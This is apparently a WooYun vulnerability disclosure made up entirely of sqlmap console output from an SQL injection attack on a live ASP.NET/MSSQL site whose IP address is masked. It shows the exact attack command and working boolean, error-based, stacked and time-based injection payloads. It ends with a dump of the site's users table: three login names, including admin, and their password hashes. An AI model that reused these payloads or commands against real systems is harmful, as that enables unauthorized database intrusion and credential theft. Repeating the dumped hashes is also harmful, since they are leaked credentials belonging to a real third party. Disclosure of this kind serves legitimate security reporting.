WooYun.org

C:\Users\quemiao\Downloads\sqlmapproject-sqlmap-064c2a7>sqlmap.py -u http://**.**.**.**/curriculum_show.aspx?id=141 -D wgy -T users -C loginid,loginpwd --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151103}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:20:41
[20:20:41] [INFO] resuming back-end DBMS 'microsoft sql server'
[20:20:41] [INFO] testing connection to the target URL
[20:20:42] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:20:42] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[20:20:43] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=141 AND 3869=3869
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=141 AND 8830=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8830=8830) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(118)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4517=4517) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(118)+CHAR(113))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=141;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=141 WAITFOR DELAY '0:0:5'
---
[20:20:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[20:20:43] [INFO] fetching entries of column(s) 'loginid, loginpwd' for table 'users' in database 'wgy'
[20:20:43] [INFO] retrieved: 3
[20:20:43] [INFO] fetching number of distinct values for column 'loginid'
[20:20:43] [INFO] retrieved: 3
[20:20:43] [INFO] using column 'loginid' as a pivot for retrieving row data
[20:20:44] [INFO] retrieved: admin
[20:20:44] [INFO] retrieved: 9D587B04DE9B99EFE92C46DF69F1462E
[20:20:44] [INFO] retrieved: hyq
[20:20:44] [INFO] retrieved: 66E70D9E0DD29365369173591DC1B6B4
[20:20:44] [INFO] retrieved: xgb
[20:20:45] [INFO] retrieved: B90CD10B6FB44A0556A657B2C0FB8582
[20:20:45] [INFO] analyzing table dump for possible password hashes
[20:20:45] [INFO] recognized possible password hashes in column 'loginpwd'
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: wgy
Table: users
[3 entries]
+---------+----------------------------------+
| loginid | loginpwd                         |
+---------+----------------------------------+
| admin   | 9D587B04DE9B99EFE92C46DF69F1462E |
| hyq     | 66E70D9E0DD29365369173591DC1B6B4 |
| xgb     | B90CD10B6FB44A0556A657B2C0FB8582 |
+---------+----------------------------------+
[20:21:23] [WARNING] table 'wgy.dbo.users' dumped to CSV file 'C:\Users\quemiao\.sqlmap\output\**.**.**.**\dump\wgy\users-639aca84.csv'
[20:21:23] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 8 times
[20:21:23] [INFO] fetched data logged to text files under 'C:\Users\quemiao\.sqlmap\output\**.**.**.**'
[*] shutting down at 20:21:23